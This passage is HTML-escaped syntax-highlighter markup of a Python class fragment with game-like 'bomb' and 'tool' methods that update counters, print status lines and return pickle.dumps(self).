class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-37&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-38&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;def&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;bomb&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-39&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;bomb_Perfection&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-40&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;# your bomb is too powerful. so boom with u......&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-41&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot; %s : [Bomb] bomb Perfection = %d&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;%&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;bomb_Perfection&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-42&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;pickle&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;dumps&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-43&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-44&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;def&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;tool&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-45&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;tt&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;choice&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;tools_list&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-46&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot; %s : [Tool] Find : %s !&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;%&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;tt&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-47&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;tools&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;append&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;tt&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-48&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;pickle&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;dumps&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; 